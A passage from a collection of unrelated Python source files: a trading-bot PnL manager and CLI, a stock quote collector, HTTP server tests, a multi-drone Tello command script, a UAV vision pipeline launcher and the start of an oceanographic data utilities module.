table[-1] += _rounder(slippage, cum_fees, dec=2)
return table
def set_statistics(self, series, period):
""" Compute statistics of a series of price or index values.
Parameters
----------
series : np.ndarray[ndim=1, dtype=np.float64]
Series of price or index values.
Returns
-------
list
Some statistics predefined when initialize the object.
"""
metric_values = []
for metric in self.metrics:
if series.size < 2:
metric_values += [0]
elif metric.lower() == 'return':
metric_values += [series[-1] - series[0]]
elif metric.lower() in ['perf', 'perf.', 'performance']:
metric_values += [series[-1] / series[0] - 1.]
elif metric.lower() == 'sharpe':
metric_values += [fy.sharpe(series, period=period)]
elif metric.lower() == 'calmar':
metric_values += [fy.calmar(series, period=period)]
elif metric.lower() == 'maxdd':
metric_values += [fy.mdd(series)]
else:
self.logger.error('Unknown metric: {}'.format(metric))
return _rounder(*metric_values, dec=2)
def _get_period_index(self, df, period):
if period.lower() == 'daily':
_index = df.index >= df.index[-1] - 86400
elif period.lower() == 'weekly':
_index = df.index >= df.index[-1] - 86400 * 7
elif period.lower() == 'monthly':
_index = df.index >= df.index[-1] - 86400 * 30
elif period.lower() == 'yearly':
_index = df.index >= df.index[-1] - 86400 * 365
elif period.lower() == 'total':
_index = df.index >= df.index[0]
else:
self.logger.error('Unknown period: {}'.format(period))
_index = None
# NOT CLEAN SOLUTION
# if _index.sum() < 2:
# _index = df.index >= df.index[-2]
return _index
def _set_ref_pair(self, _id, pair, freq, TS_0):
if self.min_freq is None or freq < self.min_freq:
self.min_freq = freq
if self.min_TS is None or TS_0 < self.min_TS:
self.min_TS = TS_0
if pair not in self.strat_by_pair:
self.strat_by_pair[pair] = {'strat': []}
f = self.strat_by_pair[pair].get('freq')
t = self.strat_by_pair[pair].get('TS_0')
if f is None or freq < f or (freq == f and TS_0 < t):
self.strat_by_pair[pair]['freq'] = freq
self.strat_by_pair[pair]['TS_0'] = TS_0
self.strat_by_pair[pair]['ref'] = _id
self.strat_by_pair[pair]['strat'] += [_id]
def _update_pnl(self):
pairs = ','.join(list(self.strat_by_pair.keys()))
self.close = get_close(pairs)
if not isinstance(self.close, dict):
self.close = {pairs: self.close}
total_ret = 0.
t = int(time.time() / self.min_freq + 1) * self.min_freq
for pair, strats_dict in self.strat_by_pair.items():
close = self.close[pair]
for strat in strats_dict['strat']:
df = self.pnl[strat]['pnl']
T = df.index[-1]
if T == t:
df = df.drop(T, axis=0)
df = update_pnl(df, close, t)
self.pnl[strat]['pnl'] = df
total_ret += df.loc[t, 'PnL']
val = self.tot_val.value.iloc[-1]
self.tot_val.loc[t, 'value'] = val + total_ret
self.tot_val.loc[t, ('slippage', 'fee')] = 0, 0
def update_pnl(df, close, t):
""" Update PnL dataframe with closed price. """
T = df.index[-1]
ret = close - df.loc[T, 'price']
vol = df.loc[T, 'volume']
pos = df.loc[T, 'signal']
df.loc[t, 'price'] = close
df.loc[t, 'returns'] = ret
df.loc[t, 'volume'] = vol
df.loc[t, 'position'] = pos
df.loc[t, 'exchanged_volume'] = 0
df.loc[t, 'signal'] = pos
df.loc[t, 'delta_signal'] = 0
df.loc[t, 'fee'] = 0
df.loc[t, 'PnL'] = ret * vol * pos
df.loc[t, 'cumPnL'] = df.loc[T, 'cumPnL'] + df.loc[t, 'PnL']
df.loc[t, 'value'] = df.loc[T, 'value'] + df.loc[t, 'PnL']
df.loc[t, 'slippage'] = 0
return df
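# update_pnl() appends a mark-to-market row at timestamp t: position and volume
# are carried forward unchanged, the new 'PnL' is the price move times volume
# times position, and fees, slippage and exchanged volume for the synthetic row
# are set to zero.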
class CLI(_ClientCLI):
""" Object to allow a Command Line Interface. """
# TODO : append 'perf' command on specified strategy
# append 'balance' command on specified pair currency
txt = ('The following commands are supported, press <ENTER> at the end.\n'
' - <q> quit the command line interface.\n'
' - <start [strategy_name]> run the specified strategy bot.\n'
' - <stop [strategy_name]> interrupt the specified strategy bot.\n'
' - <stop> interrupt the TradingBotManager.\n'
' - <ENTER> update the KPIs of the currently running strategy bots.\n'
"If no command is received within 30 seconds, the CLI exits.")
TIMEOUT = 30
strat_bot = {}
pair = {}
txt_running_clients = ''
running_strats = {}
def __init__(self, path, address=('', 50000), authkey=b'tradingbot'):
""" Initialize a CLI object. """
# TODO : if trading bot not yet running => launch it
super(CLI, self).__init__(address=address, authkey=authkey)
self.logger = logging.getLogger('cli')
self.path = path
self.term = Terminal()
def __enter__(self):
""" Enter. """
self.logger.debug('enter')
# TODO : Load config ?
super(CLI, self).__enter__()
self.conn_tbm.thread = Thread(target=self.listen_tbm, daemon=True)
self.conn_tbm.thread.start()
return self
def __exit__(self, exc_type, exc_value, exc_tb):
""" Exit. """
# TODO : Save configuration ?
if exc_type is not None:
self.logger.error(
'{}: {}'.format(exc_type, exc_value),
exc_info=True
)
super(CLI, self).__exit__(exc_type, exc_value, exc_tb)
self.conn_tbm.thread.join()
self.logger.debug('exit')
def __iter__(self):
return self
def __next__(self):
if self.is_stop():
raise StopIteration
time.sleep(0.15)
print(self.txt)
i, o, e = select.select([sys.stdin], [], [], self.TIMEOUT)
if i:
k = sys.stdin.readline().strip('\n').lower().split(' ')
self.logger.debug('command: {}'.format(k))
self._request_running_clients()
time.sleep(0.1)
else:
self.logger.debug('Time out, CLI exit')
k = ['q']
if k[0] == 'q':
raise StopIteration
elif k[0] == 'stop':
if len(k) < 2 or k[1] in ['all', 'trading_bot']:
return ['_stop', 'tradingbot']
elif k[1] in self.running_strats:
return ['_stop', k[1]]
elif k[0] == 'start':
if len(k) < 2:
self.logger.error("With the 'start' command you must specify "
"the name of a strategy bot")
else:
return k[:2]
elif k[0] == 'perf':
if len(k) < 2:
k += ['all']
return k
elif k[1] in self.running_strats:
return k[:2]
elif not k[0]:
return 'sb_update'
self.logger.error("Unknown commands {}".format(k))
def display(self):
print(self.term.home + self.term.clear)
self.logger.debug('display')
strat_val = [['-'] * 3, ['Strategies', 'Values', 'Volumes'], ['-'] * 3]
for s, args in self.strat_values.items():
strat_val += [[s, '{:.2f}'.format(args['value']),
'{:.8f}'.format(args['volume'])]]
strat_val += [['-'] * 3]
txt_strat = _set_text(*strat_val) if self.strat_values else ''
txt_clients = self.txt_running_clients
strat = {
k: v for k, v in self.strat_bot.items() if v.get('pnl') is not None
}
if strat:
rm = _ResultManager(strat)
txt_stats = _set_text(*rm.get_current_stats())
close = rm.close
txt_close = [['-'] * 2, ['Pair', 'Close'], ['-'] * 2]
for pair, price, in close.items():
txt_close += [[pair, price], ['-'] * 2]
txt_close = txt_close[:-1] + [['-'] * 2]
txt_close = _set_text(*txt_close)
txt_balance = _set_text(*self._set_text_balance())
txt_pos = _set_text(*self._set_text_position())
txt = _zip_text(
txt_stats,
txt_close + '\n\n' + txt_strat + '\n\n' + txt_clients + '\n\n' + txt_balance
)
print(txt)
print(txt_pos)
else:
print(txt_clients + 'No strategy bot is running.')
def listen_tbm(self):
self.logger.debug('start listen TradingBotManager')
for k, a in self.conn_tbm:
if self.is_stop():
self.conn_tbm.shutdown()
elif k is None:
continue
self._handler_tbm(k, a)
self.update()
if k == 'sb_update':
# TODO : display performances
self.display()
self.logger.debug('stop listen TradingBotManager')
def run(self):
# TODO : request running clients
self._request_running_clients()
for k in self:
if k is None:
continue
elif k == 'sb_update':
self.conn_tbm.send((k, None),)
elif k[0] in ['perf', 'start', '_stop']:
self.conn_tbm.send((k[0], k[1:]),)
else:
self.logger.error('Unknown command: {}'.format(k))
time.sleep(0.1)
def update(self):
self.logger.debug('update start')
self.strat_values = {}
for k in self.strat_bot:
txt = 'update {}'.format(k)
pnl = get_df(self.path + k, 'PnL', ext='.dat')
if pnl.empty:
continue
value = pnl.value.iloc[-1]
self.strat_values[k] = {'value': value,
'volume': value / pnl.price.iloc[-1]}
self.logger.debug(txt)
self.strat_bot[k]['pnl'] = pnl
def _handler_tbm(self, k, a):
# information received from TradingBotManager
if k is None:
pass
elif k == 'sb_update':
self.pair = {}
self.strat_bot = {n: self._get_sb_dict(i, n) for i, n in a.items()}
elif k == 'running_clients':
self.running_strats = a['strategy_bots']
self.txt_running_clients = ''
for c, v in a.items():
if c == 'strategy_bots':
if not v:
continue
self.txt_running_clients += c + ':\n'
for sc, sv in v.items():
self.txt_running_clients += '{} is {}\n'.format(sc, sv)
else:
self.txt_running_clients += '{} is {}\n'.format(c, v)
elif k == 'balance':
self.logger.info('Receive balance: {}'.format(a))
self.balance = a
elif k in ['cpos', 'cvol']:
for key, args in self.strat_bot.items():
if args['id'] == a[0]:
self.strat_bot[key][k] = a[1]
else:
self.logger.error('received unknown message {}: {}'.format(k, a))
def _get_sb_dict(self, _id, name):
# load some configuration info
sb_dict = {'id': _id}
cfg = load_config_params(self.path + name + '/configuration.yaml')
sb_dict['pair'] = pair = cfg['order_instance']['pair']
sb_dict['vali'] = cfg['order_instance'].get('validate', False)
sb_dict['freq'] = cfg['strat_manager_instance']['frequency']
sb_dict['kwrd'] = cfg['result_instance']
self.conn_tbm.send(('get_pos', _id),)
self.conn_tbm.send(('get_vol', _id),)
sb_dict['cpos'] = cfg['strat_manager_instance']['current_pos']
sb_dict['cvol'] = cfg['strat_manager_instance']['current_vol']
if pair not in self.pair:
self.pair[pair] = []
self.pair[pair] += [pair]
return sb_dict
def _request_running_clients(self):
self.conn_tbm.send(('get_running_clients', None),)
time.sleep(0.1)
def _set_text_balance(self):
ccy = []
for pair in self.pair:
c1, c2 = pair[:4], pair[4:]
ccy = ccy + [c1] if c1 not in ccy and c1 in self.balance else ccy
ccy = ccy + [c2] if c2 not in ccy and c2 in self.balance else ccy
txt_list = [('-', '-'), ('Currency', 'Balance'), ('-', '-')]
for c in ccy:
txt_list += [[c] + _rounder(self.balance[c], dec=8)]
return txt_list + [('-', '-')]
def _set_text_position(self):
txt_list = [['-'] * 6,
['Strategy', 'Real Position', 'Theorical Position', 'Rvol', 'Rvol2', 'Thvol'],
['-'] * 6]
for name, kwargs in self.strat_bot.items():
pnl = kwargs['pnl']
re_pos = pnl.position.iloc[0] + pnl.delta_signal.sum()
th_pos = kwargs['cpos']
re_vol = pnl.volume.iloc[0] + (pnl.PnL / pnl.price).sum()
re_vol_2 = pnl.volume.iloc[0] + (pnl.exchanged_volume * np.sign(pnl.delta_signal)).sum()
th_vol = kwargs['cvol']
txt_list += [[name, re_pos, th_pos, re_vol, re_vol_2, th_vol]]
return txt_list + [['-'] * 6]
if __name__ == "__main__":
import logging.config
# Load logging configuration
log_config = load_config_params('./trading_bot/logging.ini')
logging.config.dictConfig(log_config)
# Load general configuration
gen_config = load_config_params('./general_config.yaml')
path = gen_config['path']['strategy']
try:
cli = CLI(path)
except ConnectionRefusedError:
txt = 'TradingBotManager is not running, do you want to run it? Y/N'
while True:
a = input(txt)
if a and a[0].lower() == 'y':
# TODO : run TradingBotServer
print('not yet implemented')
break
elif a and a[0].lower() == 'n':
exit()
else:
print('Unknown command: {}. Answer with yes or no.'.format(a))
with cli:
cli.run()
|
stockcollector.py
|
import json
import threading
import datetime
from QAPUBSUB.consumer import subscriber_routing
from QAPUBSUB.producer import publisher, publisher_routing
from QARealtimeCollector.setting import eventmq_ip
from QUANTAXIS.QAARP.QAUser import QA_User
from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread
from QUANTAXIS.QAFetch.QATdx_adv import QA_Tdx_Executor
from QUANTAXIS.QAUtil.QATransform import QA_util_to_json_from_pandas
class QARTC_Stock(QA_Tdx_Executor):
def __init__(self):
super().__init__(name='QAREALTIME_COLLECTOR_STOCK')
self.codelist = []
self.sub = subscriber_routing(host=eventmq_ip,
exchange='QARealtime_Market', routing_key='stock')
self.sub.callback = self.callback
self.pub = publisher(
host=eventmq_ip, exchange='stocktransaction')
threading.Thread(target=self.sub.start, daemon=True).start()
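# Wiring: control messages (subscribe/unsubscribe) arrive on the
# 'QARealtime_Market' exchange with routing key 'stock', and the collected
# quotes are re-published as JSON on the 'stocktransaction' exchange roughly
# once per second (see run()).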
def subscribe(self, code):
"""Subscribe to an additional instrument code.
Arguments:
code {str} -- instrument code to add to the collection list, e.g. '000001'
"""
if code not in self.codelist:
self.codelist.append(code)
def unsubscribe(self, code):
self.codelist.remove(code)
def callback(self, a, b, c, data):
data = json.loads(data)
if data['topic'] == 'subscribe':
print('receive new subscribe: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.subscribe(item)
else:
self.subscribe(new_ins)
if data['topic'] == 'unsubscribe':
print('receive new unsubscribe: {}'.format(data['code']))
new_ins = data['code'].replace('_', '.').split(',')
if isinstance(new_ins, list):
for item in new_ins:
self.unsubscribe(item)
else:
self.unsubscribe(new_ins)
def get_data(self):
data, time = self.get_realtime_concurrent(self.codelist)
data = QA_util_to_json_from_pandas(data.reset_index())
self.pub.pub(json.dumps(data))
def run(self):
import time
while 1:
self.get_data()
print(datetime.datetime.now())
time.sleep(1)
if __name__ == "__main__":
r = QARTC_Stock()
r.subscribe('000001')
r.subscribe('000002')
r.start()
r.subscribe('600010')
import json
import time
time.sleep(2)
publisher_routing(exchange='QARealtime_Market', routing_key='stock').pub(json.dumps({
'topic': 'subscribe',
'code': '600012'
}), routing_key='stock')
r.unsubscribe('000001')
|
test_server.py
|
"""Tests for the HTTP server."""
# -*- coding: utf-8 -*-
# vim: set fileencoding=utf-8 :
import os
import socket
import tempfile
import threading
import time
import pytest
from .._compat import bton
from ..server import Gateway, HTTPServer
from ..testing import (
ANY_INTERFACE_IPV4,
ANY_INTERFACE_IPV6,
EPHEMERAL_PORT,
get_server_client,
)
def make_http_server(bind_addr):
"""Create and start an HTTP server bound to bind_addr."""
httpserver = HTTPServer(
bind_addr=bind_addr,
gateway=Gateway,
)
threading.Thread(target=httpserver.safe_start).start()
while not httpserver.ready:
time.sleep(0.1)
return httpserver
non_windows_sock_test = pytest.mark.skipif(
not hasattr(socket, 'AF_UNIX'),
reason='UNIX domain sockets are only available under UNIX-based OS',
)
@pytest.fixture
def http_server():
"""Provision a server creator as a fixture."""
def start_srv():
bind_addr = yield
httpserver = make_http_server(bind_addr)
yield httpserver
yield httpserver
srv_creator = iter(start_srv())
next(srv_creator)
yield srv_creator
try:
while True:
httpserver = next(srv_creator)
if httpserver is not None:
httpserver.stop()
except StopIteration:
pass
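# The http_server fixture is generator-driven: a test calls
# http_server.send(bind_addr) to obtain a started HTTPServer bound to that
# address, and the fixture stops every server it handed out during teardown.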
@pytest.fixture
def unix_sock_file():
"""Provide a temporary UNIX socket file path and remove it after the test."""
tmp_sock_fh, tmp_sock_fname = tempfile.mkstemp()
yield tmp_sock_fname
os.close(tmp_sock_fh)
os.unlink(tmp_sock_fname)
@pytest.mark.parametrize(
'ip_addr',
(
ANY_INTERFACE_IPV4,
ANY_INTERFACE_IPV6,
)
)
def test_bind_addr_inet(http_server, ip_addr):
"""Check that bound IP address is stored in server."""
httpserver = http_server.send((ip_addr, EPHEMERAL_PORT))
assert httpserver.bind_addr[0] == ip_addr
assert httpserver.bind_addr[1] != EPHEMERAL_PORT
@non_windows_sock_test
def test_bind_addr_unix(http_server, unix_sock_file):
"""Check that bound UNIX socket address is stored in server."""
httpserver = http_server.send(unix_sock_file)
assert httpserver.bind_addr == unix_sock_file
@pytest.mark.skip(reason="Abstract sockets don't work currently")
@non_windows_sock_test
def test_bind_addr_unix_abstract(http_server):
"""Check that bound UNIX socket address is stored in server."""
unix_abstract_sock = b'\x00cheroot/test/socket/here.sock'
httpserver = http_server.send(unix_abstract_sock)
assert httpserver.bind_addr == unix_abstract_sock
PEERCRED_IDS_URI = '/peer_creds/ids'
PEERCRED_TEXTS_URI = '/peer_creds/texts'
class _TestGateway(Gateway):
def respond(self):
req = self.req
conn = req.conn
req_uri = bton(req.uri)
if req_uri == PEERCRED_IDS_URI:
peer_creds = conn.peer_pid, conn.peer_uid, conn.peer_gid
return ['|'.join(map(str, peer_creds))]
elif req_uri == PEERCRED_TEXTS_URI:
return ['!'.join((conn.peer_user, conn.peer_group))]
return super(_TestGateway, self).respond()
@pytest.mark.skip(
reason='Test HTTP client is not able to work through UNIX socket currently'
)
@non_windows_sock_test
def test_peercreds_unix_sock(http_server, unix_sock_file):
"""Check that peercred lookup and resolution work when enabled."""
httpserver = http_server.send(unix_sock_file)
httpserver.gateway = _TestGateway
httpserver.peercreds_enabled = True
testclient = get_server_client(httpserver)
expected_peercreds = os.getpid(), os.getuid(), os.getgid()
expected_peercreds = '|'.join(map(str, expected_peercreds))
assert testclient.get(PEERCRED_IDS_URI) == expected_peercreds
assert 'RuntimeError' in testclient.get(PEERCRED_TEXTS_URI)
httpserver.peercreds_resolve_enabled = True
import grp
expected_textcreds = os.getlogin(), grp.getgrgid(os.getgid()).gr_name
expected_textcreds = '!'.join(map(str, expected_textcreds))
assert testclient.get(PEERCRED_TEXTS_URI) == expected_textcreds
|
multi_tello_test.py
|
# -*- coding: utf-8 -*-
import sys
import time
from tello_manager import *
import Queue
import time
import os
import binascii
reload(sys)
sys.setdefaultencoding('utf-8')
def create_execution_pools(num):
pools = []
for x in range(num):
execution_pool = Queue.Queue()
pools.append(execution_pool)
return pools
def drone_handler(tello, queue):
while True:
while queue.empty():
pass
command = queue.get()
tello.send_command(command)
def all_queue_empty(execution_pools):
for queue in execution_pools:
if not queue.empty():
return False
return True
def all_got_response(manager):
for tello_log in manager.get_log().values():
if not tello_log[-1].got_response():
return False
return True
def save_log(manager):
log = manager.get_log()
if not os.path.exists('log'):
try:
os.makedirs('log')
except Exception, e:
pass
out = open('log/' + start_time + '.txt', 'w')
cnt = 1
for stat_list in log.values():
out.write('------\nDrone: %s\n' % cnt)
cnt += 1
for stat in stat_list:
#stat.print_stats()
            # renamed to avoid shadowing the built-in str
            stats_str = stat.return_stats()
            out.write(stats_str)
out.write('\n')
def check_timeout(start_time, end_time, timeout):
diff = end_time - start_time
time.sleep(0.1)
return diff > timeout
manager = Tello_Manager()
start_time = str(time.strftime("%a-%d-%b-%Y_%H-%M-%S-%Z", time.localtime(time.time())))
try:
file_name = sys.argv[1]
f = open(file_name, "r")
commands = f.readlines()
tello_list = []
execution_pools = []
sn_ip_dict = {}
id_sn_dict = {}
ip_fid_dict = {}
for command in commands:
if command != '' and command != '\n':
command = command.rstrip()
if '//' in command:
# ignore comments
continue
elif 'scan' in command:
num_of_tello = int(command.partition('scan')[2])
manager.find_avaliable_tello(num_of_tello)
tello_list = manager.get_tello_list()
execution_pools = create_execution_pools(num_of_tello)
for x in range(len(tello_list)):
t1 = Thread(target=drone_handler, args=(tello_list[x], execution_pools[x]))
ip_fid_dict[tello_list[x].tello_ip] = x
#str_cmd_index_dict_init_flag [x] = None
t1.daemon = True
t1.start()
elif '>' in command:
id_list = []
id = command.partition('>')[0]
if id == '*':
for x in range(len(tello_list)):
id_list.append(x)
else:
                    # index starts from 1
id_list.append(int(id)-1)
action = str(command.partition('>')[2])
# push command to pools
for tello_id in id_list:
tmp_sn = id_sn_dict[tello_id]
reflec_ip = sn_ip_dict[tmp_sn]
fid = ip_fid_dict[reflec_ip]
execution_pools[fid].put(action)
elif 'battery_check' in command:
threshold = int(command.partition('battery_check')[2])
for queue in execution_pools:
queue.put('battery?')
# wait till all commands are executed
while not all_queue_empty(execution_pools):
time.sleep(0.5)
# wait for new log object append
time.sleep(1)
# wait till all responses are received
while not all_got_response(manager):
time.sleep(0.5)
for tello_log in manager.get_log().values():
battery = int(tello_log[-1].response)
print ('[Battery_Show]show drone battery: %d ip:%s\n' % (battery,tello_log[-1].drone_ip))
if battery < threshold:
print('[Battery_Low]IP:%s Battery < Threshold. Exiting...\n'%tello_log[-1].drone_ip)
save_log(manager)
exit(0)
print ('[Battery_Enough]Pass battery check\n')
elif 'delay' in command:
delay_time = float(command.partition('delay')[2])
print ('[Delay_Seconds]Start Delay for %f second\n' %delay_time)
time.sleep(delay_time)
elif 'correct_ip' in command:
for queue in execution_pools:
queue.put('sn?')
while not all_queue_empty(execution_pools):
time.sleep(0.5)
time.sleep(1)
while not all_got_response(manager):
time.sleep(0.5)
for tello_log in manager.get_log().values():
sn = str(tello_log[-1].response)
tello_ip = str(tello_log[-1].drone_ip)
sn_ip_dict[sn] = tello_ip
elif '=' in command:
drone_id = int(command.partition('=')[0])
drone_sn = command.partition('=')[2]
id_sn_dict[drone_id-1] = drone_sn
print ('[IP_SN_FID]:Tello_IP:%s------Tello_SN:%s------Tello_fid:%d\n'%(sn_ip_dict[drone_sn],drone_sn,drone_id))
#print id_sn_dict[drone_id]
elif 'sync' in command:
timeout = float(command.partition('sync')[2])
print '[Sync_And_Waiting]Sync for %s seconds \n' % timeout
time.sleep(1)
try:
start = time.time()
# wait till all commands are executed
while not all_queue_empty(execution_pools):
now = time.time()
if check_timeout(start, now, timeout):
raise RuntimeError
print '[All_Commands_Send]All queue empty and all command send,continue\n'
# wait till all responses are received
while not all_got_response(manager):
now = time.time()
if check_timeout(start, now, timeout):
raise RuntimeError
print '[All_Responses_Get]All response got, continue\n'
except RuntimeError:
print '[Quit_Sync]Fail Sync:Timeout exceeded, continue...\n'
# wait till all commands are executed
while not all_queue_empty(execution_pools):
time.sleep(0.5)
time.sleep(1)
# wait till all responses are received
while not all_got_response(manager):
time.sleep(0.5)
save_log(manager)
except KeyboardInterrupt:
print '[Quit_ALL]Multi_Tello_Task got exception. Sending land to all drones...\n'
for ip in manager.tello_ip_list:
manager.socket.sendto('land'.encode('utf-8'), (ip, 8889))
save_log(manager)
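# Illustrative command file accepted by the parser above (a sketch inferred from this
# script; the serial numbers and Tello commands below are placeholders, not real values):
#   scan 2
#   battery_check 20
#   correct_ip
#   1=0TQZH79EDC2983
#   2=0TQZH79EDC2984
#   *>takeoff
#   sync 10
#   1>forward 50
#   2>back 50
#   sync 10
#   *>land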
|
main.py
|
import argparse
from datetime import datetime
import logging
from modules.targetAcquisition.taxi.TaxiWorker import taxi_worker
import os
import multiprocessing as mp
import json
from modules.targetAcquisition.targetAcquisitionWorker import targetAcquisitionWorker
from modules.decklinksrc.decklinkSrcWorker import decklinkSrcWorker
from modules.decklinksrc.decklinkSrcWorker_taxi import decklinkSrcWorker_taxi
from modules.QRScanner.QRWorker import qr_worker
from modules.search.searchWorker import searchWorker
from modules.commandModule.commandWorker_flight import flight_command_worker, pogi_subworker
from modules.commandModule.commandWorker_taxi_first import command_taxi_worker_continuous, taxi_command_worker_first
from modules.mergeImageWithTelemetry.mergeImageWithTelemetryWorker import pipelineMergeWorker
from modules.geolocation.geolocationWorker import geolocation_locator_worker, geolocation_output_worker
from modules.searchExplosive.searchExplosiveWorker import searchExplosiveWorker
from modules.videoDisplay.videoDisplayWorker import videoDisplayWorker
PIGO_DIRECTORY = ""
POGI_DIRECTORY = ""
# Main process called by command line
# Main process manages PROGRAMS, programs call submodules for data processing and move data around to achieve a goal.
logger = None
def callTrain():
    """Run YOLOv2 training if the assets directory is present."""
    # store the current working directory prior to any change
    main_directory = os.getcwd()
logger.debug("main/callTrain: Started")
if os.path.exists("targetAcquisition/yolov2_assets"):
# Importing file runs the process inside
import modules.targetAcquisition.yolov2_assets.train
else:
logger.error("main/callTrain: YOLOV2_ASSETS Directory not found. Specify path")
logger.error("main/callTrain: Finished")
def flightProgram():
"""
Flight program implementation goes here. Outline:
Instantiate pipeline, video mediator, start frame capture, feed tent coordinates into pipeline.
Feed tent coordinates from pipeline into geolocation
Get GPS coordinates from geolocation
Send coordinates to command module
Parameters: None
"""
logger.debug("main/flightProgram: Start flight program")
# Queue from decklinksrc to targetAcquisition
videoPipeline = mp.Queue()
# Queue from command module out to fusion module containing timestamped telemetry data from POGI
telemetryPipeline = mp.Queue()
# Queue from fusion module out to targetAcquisition, containing grouped image and telemetry data from a "single time"
mergedDataPipeline = mp.Queue()
# Queue from targetAcquisition out to geolocation_locator_worker, containing centre-of-bbox coordinate data and associated telemetry data
    bboxAndTelemetryPipeline = mp.Queue()
# Intermediary pipeline transferring a list of potential coordinates from geolocaion_locator_worker to geolocation_ouput_worker
geolocationIntermediatePipeline = mp.Queue()
# Queue from geolocation module out to command module, containing (x, y) coordinates of detected pylons
locationCommandPipeline = mp.Queue()
# Lock for bboxAndTelemetryPipeline
bboxAndTelemetryLock = mp.Lock()
# Lock for geolocationIntermediatePipeline
geolocationIntermediateLock = mp.Lock()
# Utility locks
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=decklinkSrcWorker, args=(pause, quit, videoPipeline)),
mp.Process(target=pipelineMergeWorker,
args=(pause, quit, videoPipeline, telemetryPipeline, mergedDataPipeline)),
mp.Process(target=targetAcquisitionWorker, args=(pause, quit, mergedDataPipeline, bboxAndTelemetryPipeline)),
mp.Process(target=geolocation_locator_worker,
args=(pause, quit, bboxAndTelemetryPipeline, geolocationIntermediatePipeline, bboxAndTelemetryLock)),
mp.Process(target=geolocation_output_worker,
args=(pause, quit, geolocationIntermediatePipeline, locationCommandPipeline, geolocationIntermediateLock)),
mp.Process(target=flight_command_worker,
args=(pause, quit, locationCommandPipeline, telemetryPipeline, PIGO_DIRECTORY, POGI_DIRECTORY))
]
for p in processes:
p.start()
logger.debug("main/flightProgram: Flight program init complete")
def qrProgram():
"""
    QR scanning program implementation here.
Parameters: None
Returns: None
"""
videoPipeline = mp.Queue()
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=decklinkSrcWorker_taxi, args=(pause, quit, videoPipeline)),
mp.Process(target=qr_worker, args=(pause, quit, videoPipeline))
]
for p in processes:
p.start()
def searchExplosiveProgram():
"""
Search Explosive program implementation
Parameters: None
Returns: None
"""
pipelineIn = mp.Queue()
pipelineOut = mp.Queue()
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=searchExplosiveWorker, args=(pause, quit, pipelineIn, pipelineOut)),
]
for p in processes:
p.start()
def init_logger():
baseDir = os.path.dirname(os.path.realpath(__file__))
logFileName = os.path.join(baseDir, "logs", str(datetime.today().date()) + "_" +
str(datetime.today().hour) + "." +
str(datetime.today().minute) + "." +
str(datetime.today().second) + ".log")
# with open(logFileName, 'w') as write_file:
# write_file.write("LOG START")
formatter = logging.Formatter(fmt='%(asctime)s: [%(levelname)s] %(message)s', datefmt='%I:%M:%S')
fileHandler = logging.FileHandler(filename=logFileName, mode="w")
streamHandler = logging.StreamHandler()
streamHandler.setFormatter(formatter)
fileHandler.setFormatter(formatter)
logging.basicConfig(level=logging.DEBUG, handlers=[fileHandler, streamHandler])
logging.debug("main/init_logger: Logger Initialized")
return logging.getLogger()
def taxiProgram():
"""
Taxi program implementation here.
Parameters: None
Returns: None
"""
    # logger.error logs 'msg % args' with severity 'ERROR'.
logger.error("main/taxiProgram: Taxi Program Started")
# Set up data structures for first POGI retrieval
pogiInitPipeline = mp.Queue()
firstTelemetry = None
while True:
# Read pogi data and put it into the pipeline if it is available
pogi_subworker(pogiInitPipeline, POGI_DIRECTORY)
# If we don't get any data, try again
if pogiInitPipeline.empty():
continue # skips the rest of the loop and loops again
# Once we have data, break out of the loop
firstTelemetry = pogiInitPipeline.get()
break
# Get cached Pylon GPS coordinates
pylonGpsData = None
with open("temp_pylon_gps") as file:
pylonGpsData = json.load(file)
# If any of the two pieces of data from above are None, throw an error and leave
if firstTelemetry is None:
logger.error("main/taxiProgram: Taxi program couldn't get telemetry data")
return
if pylonGpsData is None:
logger.error("main/taxiProgram: Taxi program couldn't get cached pylon gps data")
return
# Get result from search and run taxi command worker with the given heading command
searchResult = searchWorker(firstTelemetry.data, pylonGpsData)
taxi_command_worker_first(searchResult)
# Set up pipeline architecture for taxi
deckLinkSrcOutTaxiInPipeline = mp.Queue() # Timestamped data
taxiOutCommandInPipeline = mp.Queue()
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=decklinkSrcWorker, args=(pause, quit, deckLinkSrcOutTaxiInPipeline)),
mp.Process(target=taxi_worker, args=(pause, quit, deckLinkSrcOutTaxiInPipeline, taxiOutCommandInPipeline)),
mp.Process(target=command_taxi_worker_continuous, args=(pause, quit, taxiOutCommandInPipeline))
]
for p in processes:
p.start()
logger.error("main/taxiProgram: Taxi Program Init Finished")
return
def showVideo(): # this function needs to call functions in videoDisplay and decklinkSrcWorker
"""
Display video implementation here.
Parameters: None
Returns: None
"""
#logger.debug("main/showVideo: Video Display Started") # start message, logs with severity DEBUG
videoPipeline = mp.Queue()
# Queue from command module out to fusion module containing timestamped telemetry data from POGI
# Utility locks
pause = mp.Lock()
quit = mp.Queue()
processes = [
mp.Process(target=decklinkSrcWorker_taxi, args=(pause, quit, videoPipeline)),
mp.Process(target=videoDisplayWorker, args=(pause, quit, videoPipeline))
]
for p in processes:
p.start()
#logger.debug("main/showVideo: Video Display Finished")
return
if __name__ == '__main__':
"""
Starts the appropriate program based on what was passed in as a command line argument.
Parameters: Args for commands
Returns: None
"""
logger = init_logger()
parser = argparse.ArgumentParser()
parser.add_argument("program", help="Program name to execute (flight, taxi, search)")
    # locals() returns the current local symbol table, letting us look up the requested program function by name.
program = parser.parse_args().program
assert program + 'Program' in locals()
locals()[program + 'Program']()
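# Example invocation (a sketch based on the argument parsing above): the positional
# argument selects which <name>Program() function is looked up and called, e.g.
#   python main.py flight
#   python main.py taxi
#   python main.py qr
#   python main.py searchExplosive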
|
utilities.py
|
#!/bin/env python
# -*- coding: UTF-8 -*-
#
# Disclaimer:
# Functions get_sys_info, netcdf_and_hdf5_versions and show_versions are from:
# xarray/util/print_versions.py
#
import os
import sys
import warnings
import urllib
import json
import collections
import copy
from functools import reduce
from packaging import version
import importlib
import locale
import platform
import struct
import subprocess
import contextlib
import xarray as xr
import pandas as pd
import numpy as np
from scipy import interpolate
import pickle
import pkg_resources
import shutil
import threading
import time
from argopy.options import OPTIONS, set_options
from argopy.stores import httpstore
from argopy.errors import (
FtpPathError,
InvalidFetcher,
InvalidFetcherAccessPoint,
InvalidOption
)
try:
